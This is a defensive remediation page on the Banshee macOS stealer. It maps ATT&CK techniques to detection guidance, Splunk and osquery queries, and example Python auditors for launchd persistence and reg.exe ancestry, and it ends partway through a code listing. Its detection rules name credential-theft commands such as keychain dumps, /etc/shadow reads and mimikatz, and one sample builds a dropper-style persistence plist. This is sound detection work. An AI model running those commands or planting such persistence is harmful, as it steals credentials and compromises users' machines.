
Banshee Malware Campaign: Unmasking the Silent Threat to macOS
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1113 - Screen Capture
Detects:
- Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.
- Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk by utilities such as CopyFromScreen, xwd, or screencapture [1][2]. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.
T1033 - System Owner/User Discovery
Detects (the entries listed under this technique are the detection guidance for OS Credential Dumping, T1003, which is what their content describes):
- Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. [236][237][238] Note: domain controllers may not log replication requests originating from the default domain controller account. [239] Monitor for replication requests [240] from IPs not associated with known domain controllers. [241]
- Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, [242] which may require additional logging features to be configured in the operating system to collect the necessary information for analysis. Note: Event ID 4104 (from the Microsoft-Windows-PowerShell/Operational log) captures PowerShell script blocks, which can be analyzed to detect credential-dumping code such as Invoke-Mimikatz.
- Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%\system32\config\SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in use by adversaries may help as well.
- Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)). Note: network analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols.
- Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
- Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
- Monitor for unexpected processes interacting with lsass.exe. [243] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity. Linux: to obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/<pid>/maps, where the <pid> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
- Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Note: Event IDs are for Sysmon (Event ID 1, process create) and the Windows Security Log (Event ID 4688, a new process has been created). The example analytic below matches creation of at.exe (the legacy task scheduler client); it is a generic process-creation template rather than a credential-dumping detection, so retarget the Image filter at the dumping tools observed in the environment. If the matched tool is commonly used in your environment (e.g., by system administrators) this may lead to false positives and the analytic will require tuning.
  Analytic 1 - Suspicious Process Execution:
    (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND Image="*at.exe"
- Monitor for the SAM registry key being accessed by processes that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
T1056.001 - Keylogging
Detects:
- Monitor for unusual kernel driver installation activity.
- Monitor for calls to SetWindowsHookEx (and the legacy SetWindowsHook), GetKeyState, and GetAsyncKeyState [2] and look for common keylogging API call patterns. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
- Monitor for changes made to Windows Registry keys or values for unexpected modifications.
T1204.002 - Malicious File
Detects:
- Monitor for files created in unusual directories or files with suspicious extensions. Focus on common locations like the Downloads folder, Temp directories, or the user's Desktop, especially files that would be of interest from spearphishing attachments. While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions. For macOS, utilities that work in concert with Apple's Endpoint Security Framework such as File Monitor can be used to track file creation events.
  Analytic 1 - Batch File Write to System32:
    (sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode="11") file_path="system32" AND file_extension=".bat"
  Analytic 2 - New file creation in unusual directories:
    sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=11
    | search file_path IN ("/Downloads/", "/Temp/", "/Desktop/")
    | stats count by file_name file_extension file_path user
    | where file_extension IN ("doc", "docx", "pdf", "xls", "rtf", "exe", "scr", "lnk", "pif", "cpl", "zip")
- Monitor for processes spawned after opening a suspicious file. Common applications that might be exploited are Microsoft Word, PDF readers, or compression utilities.
  Analytic 1 - Processes created from malicious files:
    (sourcetype=WinEventLog:Security EventCode=4688) OR (sourcetype=Sysmon EventCode=1)
    | search process_name IN ("WINWORD.EXE", "EXCEL.EXE", "PDFReader.exe", "7z.exe", "powershell.exe", "cmd.exe")
    | stats count by process_name parent_process_name command_line user
    | where parent_process_name IN ("explorer.exe", "outlook.exe", "thunderbird.exe")
T1119 - Automated Collection
Detects:
- Monitor executed commands and arguments for actions that could be taken to collect internal data.
- Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.
- Any attempt to enable script execution on a system where scripting is normally disabled should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
- Monitor Azure AD (Entra ID) sign-in logs for suspicious applications authenticating to the Graph API or other sensitive resources using User Agents attributed to scripting interpreters such as Python or PowerShell.
  Analytic 1 - Suspicious applications, unusual user agents (e.g., python, PowerShell), anomalous IP addresses, and unmanaged devices:
    index="azure_ad_signin_logs" Operation="UserLogin"
    | search UserAgent="python" OR UserAgent="PowerShell"
    | stats count by ClientIP, UserId, DeviceProperties
    | where ClientIP!="expected_ip" OR DeviceProperties!="expected_properties"
T1115 - Clipboard Data
Detects:
- Monitor executed commands and arguments that collect data stored in the clipboard from users copying information within or between applications.
- Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.
T1082 - System Information Discovery
Detects:
- Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
- Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.
- Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
T1053 - Scheduled Task/Job
Detects:
- Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
  Analytic 1 - Look for task scheduling commands being executed with unusual parameters:
    index=security (sourcetype="WinEventLog:Security" OR sourcetype="linux_secure" OR sourcetype="macos_secure" OR sourcetype="container_logs")
    | eval CommandLine = coalesce(CommandLine, process)
    | where (sourcetype="WinEventLog:Security" AND EventCode IN (4697, 4702, 4698)) OR (sourcetype="linux_secure" AND (CommandLine LIKE "%cron%" OR CommandLine LIKE "%at%")) OR (sourcetype="macos_secure" AND (CommandLine LIKE "%launchctl%" OR CommandLine LIKE "%cron%")) OR (sourcetype="container_logs" AND (CommandLine LIKE "%cron%" OR CommandLine LIKE "%at%"))
    | where (sourcetype="WinEventLog:Security" AND (CommandLine LIKE "%/create%" OR CommandLine LIKE "%/delete%" OR CommandLine LIKE "%/change%")) OR (sourcetype="linux_secure" AND (CommandLine LIKE "%-f%" OR CommandLine LIKE "%-m%" OR CommandLine LIKE "%--env%")) OR (sourcetype="macos_secure" AND (CommandLine LIKE "%/Library/LaunchDaemons%" OR CommandLine LIKE "%/Library/LaunchAgents%" OR CommandLine LIKE "%/System/Library/LaunchDaemons%" OR CommandLine LIKE "%/System/Library/LaunchAgents%")) OR (sourcetype="container_logs" AND (CommandLine LIKE "%-f%" OR CommandLine LIKE "%--schedule%" OR CommandLine LIKE "%--env%"))
  Note: the Linux and macOS clauses are parenthesized so that the AND/OR precedence matches the container clause; without the parentheses the LIKE "%at%" match would apply to every sourcetype.
- Monitor for newly constructed containers that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
  Analytic 1 - Look for new container creation events with unusual parameters:
    index=container_logs sourcetype="docker_events" OR sourcetype="kubernetes_events"
    | eval event_action=coalesce(action, status)
    | where (event_action="create" OR event_action="start")
    | search event_type="container"
    | search (parameters="--privileged" OR parameters="--cap-add=" OR parameters="--volume=" OR parameters="--network=host" OR parameters="--device")
- Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
  Analytic 1 - Look for new task files with unusual parameters:
    index=security_logs OR index=system_logs (sourcetype="docker_events" OR sourcetype="kubernetes_events" OR sourcetype="wineventlog:security" OR sourcetype="linux_secure" OR sourcetype="syslog" OR sourcetype="file_monitoring")
    | eval platform=case(sourcetype=="docker_events" OR sourcetype=="kubernetes_events", "Containers", sourcetype=="wineventlog:security", "Windows", sourcetype=="linux_secure" OR sourcetype=="syslog", "Linux", sourcetype=="mac_os_events", "macOS")
    | search ((platform="Containers" AND (event_type="file_create" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/"))) OR (platform="Windows" AND EventCode=4663 AND (ObjectName="C:\Windows\System32\Tasks\" OR ObjectName="C:\Windows\Tasks\")) OR (platform="Linux" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/")) OR (platform="macOS" AND (file_path="/Library/LaunchDaemons/" OR file_path="/Library/LaunchAgents/")))
- Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
  Analytic 1 - Look for task file modifications with unusual parameters:
    index=security_logs OR index=system_logs (sourcetype="docker_events" OR sourcetype="kubernetes_events" OR sourcetype="wineventlog:security" OR sourcetype="linux_secure" OR sourcetype="syslog" OR sourcetype="file_monitoring")
    | eval platform=case(sourcetype=="docker_events" OR sourcetype=="kubernetes_events", "Containers", sourcetype=="wineventlog:security", "Windows", sourcetype=="linux_secure" OR sourcetype=="syslog", "Linux", sourcetype=="mac_os_events", "macOS")
    | search ((platform="Containers" AND (event_type="file_modify" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/" OR file_path="/etc/crontab"))) OR (platform="Windows" AND EventCode=4663 AND (ObjectName="C:\Windows\System32\Tasks\" OR ObjectName="C:\Windows\Tasks\")) OR (platform="Linux" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/" OR file_path="/etc/crontab")) OR (platform="macOS" AND (file_path="/Library/LaunchDaemons/" OR file_path="/Library/LaunchAgents/")))
- Monitor for newly executed processes that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Note: the relevant events and sources are grouped by platform (Windows; Linux/macOS; Containers, where container logs allow detection of scheduled tasks or cron jobs within container environments).
  Analytic 1 - Look for task execution with unusual parameters:
    (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="WinEventLog:Security" OR sourcetype="linux_auditd" OR sourcetype="syslog")
    | where Image IN ("schtasks.exe", "at.exe", "Taskeng.exe", "cron", "crontab", "systemd-timers")
- Monitor newly constructed scheduled jobs that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Windows systems, security event ID 4698 (A scheduled task was created) provides information on newly created scheduled tasks. It includes the TaskContent field, which contains an XML blob that captures key information on the scheduled task including the command to be executed.
  Analytic 1 - Scheduled Task Execution:
    source="*WinEventLog:Security" EventCode="4698"
    | where NOT (TaskName IN ("\Microsoft\Windows\UpdateOrchestrator\Reboot", "\Microsoft\Windows\Defrag\ScheduledDefrag"))
    | search TaskContent="powershell.exe" OR TaskContent="cmd.exe"
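The macOS entries above point at /Library/LaunchAgents and /Library/LaunchDaemons but stop at "monitor the path". The script below is an added example (not code from the original page or from any Banshee analysis) that parses the launchd property lists in those directories with the standard plistlib module and flags the traits a dropper's persistence job tends to have: a program outside the usual install locations or inside a hidden directory, an interpreter as the job's program, RunAtLoad combined with KeepAlive, and an Apple-style label outside /System. The trusted-prefix list, the interpreter list and the two sample plists are constructed assumptions for illustration; tune the first two to your fleet.

```python
# Added example: audit launchd job plists for persistence traits (not from the original page).
import os
import plistlib
import tempfile

# Real launchd directories; the per-user one is where a user-level dropper usually lands.
LAUNCHD_DIRS = (
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
)
# Assumption: program paths under these prefixes are normally benign. Tune per environment.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/", "/sbin/", "/bin/")
# Assumption: interpreters commonly used as the job's program by droppers.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "curl"}


def program_of(job: dict) -> list[str]:
    """Return the argv launchd would execute for this job (ProgramArguments wins over Program)."""
    if "ProgramArguments" in job:
        return list(job["ProgramArguments"])
    if "Program" in job:
        return [job["Program"]]
    return []


def audit_job(job: dict, directory: str) -> list[str]:
    """Return the reasons a single launchd job looks like malicious persistence ([] if none)."""
    reasons = []
    argv = program_of(job)
    if not argv:
        return reasons
    # Inspect every absolute path in argv, not just argv[0]: "/bin/sh -c /Users/x/.hidden/bin"
    # has a trusted argv[0] and the payload in argv[2].
    for path in (a for a in argv if a.startswith("/")):
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append(f"path outside trusted prefixes: {path}")
        if any(part.startswith(".") for part in path.split("/")[1:]):
            reasons.append(f"path in hidden directory: {path}")
    if os.path.basename(argv[0]) in INTERPRETERS:
        reasons.append(f"interpreter as program: {' '.join(argv)}")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive: starts at login and is restarted if killed")
    if str(job.get("Label", "")).startswith("com.apple.") and not directory.startswith("/System/"):
        reasons.append(f"Apple-style label outside /System: {job['Label']}")
    return reasons


def audit_dir(directory: str) -> dict[str, list[str]]:
    """Parse every .plist in a launchd directory; return {plist path: reasons} for suspicious jobs."""
    findings: dict[str, list[str]] = {}
    if not os.path.isdir(directory):
        return findings
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        try:
            with open(path, "rb") as fh:
                job = plistlib.load(fh)  # handles both XML and binary plists
        except (plistlib.InvalidFileException, OSError, ValueError):
            findings[path] = ["unparseable plist (inspect manually)"]
            continue
        reasons = audit_job(job, directory)
        if reasons:
            findings[path] = reasons
    return findings


def build_sample_dir() -> str:
    """Write two constructed plists (one benign, one dropper-style) into a temp dir and return it."""
    d = tempfile.mkdtemp(prefix="launchagents_")
    benign = {"Label": "com.example.updater",
              "Program": "/Applications/Example.app/Contents/MacOS/updater",
              "StartInterval": 3600}
    dropper = {"Label": "com.apple.systemhelper",  # constructed: mimics Apple naming
               "ProgramArguments": ["/bin/sh", "-c", "/Users/alice/.config/.helper"],
               "RunAtLoad": True, "KeepAlive": True}
    for name, job in (("com.example.updater.plist", benign), ("com.apple.systemhelper.plist", dropper)):
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(job, fh)
    return d


if __name__ == "__main__":
    for directory in LAUNCHD_DIRS + (build_sample_dir(),):
        for path, reasons in audit_dir(directory).items():
            print(path)
            for reason in reasons:
                print("  -", reason)
```

Run on a real Mac it walks the three launchd directories plus the constructed sample; on a non-macOS host only the sample directory exists, so only the constructed dropper job is reported. A job that trips only one heuristic (say, a legitimate agent shipped under /Library/Application Support) is a tuning candidate, not a verdict; several together, on a host where the plist was written shortly after a download, is what the T1053 and T1204.002 entries above are asking you to correlate.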
T1059.002 - AppleScript
Detects:
- Monitor executed commands and arguments that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
  Analytic 1 - Look for unusual execution of AppleScript:
    sourcetype=macOS:Process
    | search process_name="osascript"
    | eval suspicious_cmd=if(like(command_line, "%-e%") OR like(command_line, "%path/to/script%"), "Yes", "No")
    | where suspicious_cmd="Yes"
- Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Note: NSAppleScript (Foundation) and OSAScript (OSAKit) are API classes, not process names, so the analytic below only matches if the logging pipeline records the API name in the process_name field; the osascript binary is the process you will actually see.
  Analytic 1 - Look for unusual OS API execution related to AppleScript:
    sourcetype=macOS:Syslog OR sourcetype=macOS:Process
    | search (process_name="NSAppleScript" OR process_name="OSAScript")
- Monitor for newly executed processes that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
  Analytic 1 - Look for unusual AppleScript process creation:
    sourcetype=macOS:Process
    | search (parent_process_name="osascript" OR parent_process_name="NSAppleScript" OR parent_process_name="OSAScript")
  Analytic 2 - Untrusted Locations:
    source="Osquery:" EventCode="process_added" AND (Path LIKE "/Users/*/Downloads/*" OR Path LIKE "/tmp/*")
  Analytic 3 - Parent/Child Process Relationship:
    source="Osquery:" EventCode="process_added" AND ParentImage="/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder" AND Image LIKE "osascript"
T1005 - Data from Local System
Detects:
- Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
- Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (.pdf, .docx, .jpg, etc.) or local databases.
- Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
- Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
- Any attempt to enable script execution on a system where scripting is normally disabled should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
T1555 - Credentials from Password Stores
Detects:
- Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from cloud secrets managers, such as get-secret-value in AWS, gcloud secrets describe in GCP, and az keyvault secret show in Azure. Alert on any suspicious usage of these commands, such as an account or service generating an unusually high number of secret requests.
  Analytic 1 - High volume of secret requests from unusual accounts or services:
    index=security sourcetype IN ("aws:cloudtrail", "azure:activity", "gcp:activity") (eventName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") OR operationName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") OR protoPayload.methodName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys"))
- Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials. On macOS the security(1) keychain subcommands are the ones to watch.
  Analytic 1 - Commands indicating credential searches:
    (index=os sourcetype IN ("Powershell", "linux_secure", "macos_secure") CommandLine IN ("findstr /si password", "findstr /si pass", "grep -r password", "grep -r pass", "grep -r secret", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L"))
- Monitor for files being accessed that may search for common password storage locations to obtain user credentials.
  Analytic 1 - Unauthorized access to files containing credentials:
    index=security sourcetype IN ("WinEventLog:Security", "WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure") ((sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetObject IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="linux_secure" action="open" filepath IN ("/etc/shadow", "/etc/passwd", "/.aws/credentials", "/.ssh/id_rsa")) OR (sourcetype="macos_secure" event_type="open" file_path IN ("/Library/Keychains/", "/Users/*/Library/Keychains/", "/Users/*/.ssh/id_rsa")))
- Monitor for API calls that may search for common password storage locations to obtain user credentials.
- Monitor for process access (one process opening a handle to another, Sysmon Event ID 10) that may indicate a search of common password storage locations to obtain user credentials.
  Analytic 1 - Unauthorized process access indicating credential searches:
    index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure") (EventCode=10 TargetImage IN ("lsass.exe", "securityd", "ssh-agent", "gpg-agent") OR EventCode=11 TargetObject IN ("password", "creds", "credentials", "secrets", "keychain", ".kdbx", ".pfx", ".pem", ".p12", ".key") OR EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache"))
- Monitor newly executed processes that may search for common password storage locations to obtain user credentials.
  Analytic 1 - New processes with parameters indicating credential searches:
    index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure") (EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L"))
T1016 - System Network Configuration Discovery
Detects:
- Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
- Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.
- Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses. Note: the analytic looks for the creation of ipconfig, route, and nbtstat processes, all of which are system administration utilities that can be used for the purpose of system network configuration discovery. If these tools are commonly used in your environment (e.g., by system administrators) this may lead to false positives and the analytic will require tuning.
  Analytic 1 - Suspicious Process:
    (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND (Image="C:\Windows\System32\ipconfig.exe" OR Image="C:\Windows\System32\route.exe" OR Image="C:\Windows\System32\nbtstat.exe")
- Any attempt to enable script execution on a system where scripting is normally disabled should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
T1087 - Account Discovery
Detects:
- Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor access to file resources that contain local account and group information such as /etc/passwd, /Users directories, and the SAM database. If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.
- Monitor for processes that can be used to enumerate user accounts and groups such as net.exe and net1.exe, especially when executed in quick succession. [10] Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
T1083 - File and Directory Discovery
Detects:
- Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
- Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
- Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1057 - Process Discovery
Detects:
- Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.
- Monitor for API calls that may attempt to get information about running processes on a system.
- Monitor for newly executed processes that may attempt to get information about running processes on a system. To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment. Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined allow and deny lists, and should consider an anomaly detection approach so that this information can be learned dynamically. The analytic below covers the built-in Windows host discovery commands.
  Analytic 1 - Host Discovery Commands:
    (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") (Image="C:\Windows\*\hostname.exe" OR Image="C:\Windows\*\ipconfig.exe" OR Image="C:\Windows\*\net.exe" OR Image="C:\Windows\*\quser.exe" OR Image="C:\Windows\*\qwinsta.exe" OR (Image="C:\Windows\*\sc.exe" AND (CommandLine=" query " OR CommandLine=" qc ")) OR Image="C:\Windows\*\systeminfo.exe" OR Image="C:\Windows\*\tasklist.exe" OR Image="C:\Windows\*\whoami.exe")
    | stats values(Image) as "Images" values(CommandLine) as "Command Lines" by ComputerName
T1547.001 - Registry Run Keys / Startup Folder
Detects:
- Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
- Monitor the Startup folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [302]
- Monitor for newly executed processes launched from the Run/RunOnce registry keys, through Windows EID 9707 (logged to Microsoft-Windows-Shell-Core/Operational when a Run key entry is started) or by watching the "Software\Microsoft\Windows\CurrentVersion\Run" and "Software\Microsoft\Windows\CurrentVersion\RunOnce" registry keys, with the full command line. Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even by calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly. Output description: the sequence of processes that resulted in reg.exe being started from a shell, that is, a hierarchy that looks like
    great-grand_parent.exe
      grand_parent.exe
        parent.exe
          reg.exe
  Analytic 1 - Reg.exe called from Command Shell:
    (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="reg.exe" AND ParentImage="cmd.exe"
    | join left=L right=R where L.ParentProcessGuid = R.ProcessGuid [search EventCode IN (1, 4688) Image="cmd.exe" ParentImage!="explorer.exe"]
- Monitor for newly created Windows Registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
- Monitor the Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. [302] Also detect modification of the Common Startup value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (the per-user equivalent is the Startup value under the same paths beneath HKEY_CURRENT_USER). When a user logs on, any files located in the Startup folder are launched. Attackers may repoint these values at other folders in order to evade detection set on the default folders. This detection focuses on Event IDs 4688 and 1 for process creation and Event ID 4657 for modification of the registry values.
  Analytic 1 - Modification of Default Startup Folder in the Registry Key 'Common Startup':
    (source="WinEventLog:Security" EventCode="4657" ObjectValueName="Common Startup") OR (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="*Common Startup")
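The reg.exe analytic above expresses "reg.exe, parent cmd.exe, grandparent not explorer.exe" as a Splunk join. The script below is an added example (not from the original page) that does the same thing over Sysmon Event ID 1-style records in Python by indexing events on ProcessGuid, walking ParentProcessGuid upward to rebuild the ancestry, and additionally marking whether the reg.exe command line touches a Run/RunOnce key. The events, GUIDs, user names and paths are constructed for illustration.

```python
# Added example: rebuild the process ancestry of reg.exe from Sysmon EID 1-style records
# and apply the "shell not started by explorer.exe" logic of the analytic above.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    guid: str          # Sysmon ProcessGuid
    parent_guid: str   # Sysmon ParentProcessGuid
    image: str         # full image path
    command_line: str
    user: str


# Constructed events (not real telemetry). GUIDs are placeholders for readability.
EVENTS = [
    Proc("g-explorer", "g-winlogon", r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    # Interactive user: explorer -> cmd -> reg query. Benign per the analytic.
    Proc("g-cmd-user", "g-explorer", r"C:\Windows\System32\cmd.exe", 'cmd.exe', r"CORP\alice"),
    Proc("g-reg-user", "g-cmd-user", r"C:\Windows\System32\reg.exe",
         r'reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run', r"CORP\alice"),
    # Macro-style chain: explorer -> WINWORD -> cmd -> reg add to a Run key. This is the hit.
    Proc("g-winword", "g-explorer", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         'WINWORD.EXE /n "C:\\Users\\alice\\Downloads\\invoice.docm"', r"CORP\alice"),
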